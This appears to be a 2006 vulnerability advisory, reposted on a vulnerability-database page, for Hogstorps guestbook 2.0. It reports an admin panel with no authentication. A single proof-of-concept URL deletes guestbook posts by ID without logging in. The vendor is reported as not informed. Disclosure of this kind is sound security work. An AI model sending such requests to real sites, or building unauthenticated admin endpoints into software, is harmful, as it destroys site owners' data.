Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12917
HistoryJun 01, 2006 - 12:00 a.m.

Hogstorps guestbook 2.0 Remote Access to Admin Pannel

2006-06-0100:00:00
vulners.com
24

  -  Remote Access to Admin Pannel without Authentication -

-= http://colander.altervista.org/advisory/HTGuestBook2.txt =-

       -= Hogstorps guestbook 2.0 =-

Omnipresent
May 04, 2006

Vunerability(s):

Remote Access to Admin Pannel without Authentication

Product:

Hogstorps guestbook 2.0

Vendor:

http://www.hogstorp.nu

Description of product:

A free and simple guestbook.

Vulnerability / Exploit:

The application is vulnerabile to a Remote Access to Admin Pannel without Authentication.
A user can delete posts, only using a simple string sent via browser.

PoC / Proof of Concept:

http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=[Number_of_post]

Example: http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=119

And you will receive the message:

The message is deleted, go back to guestbook!

Aspcollection from Hogstorps IF

Vendor Status

Not Informed!

Credits:

omnipresent
[email protected]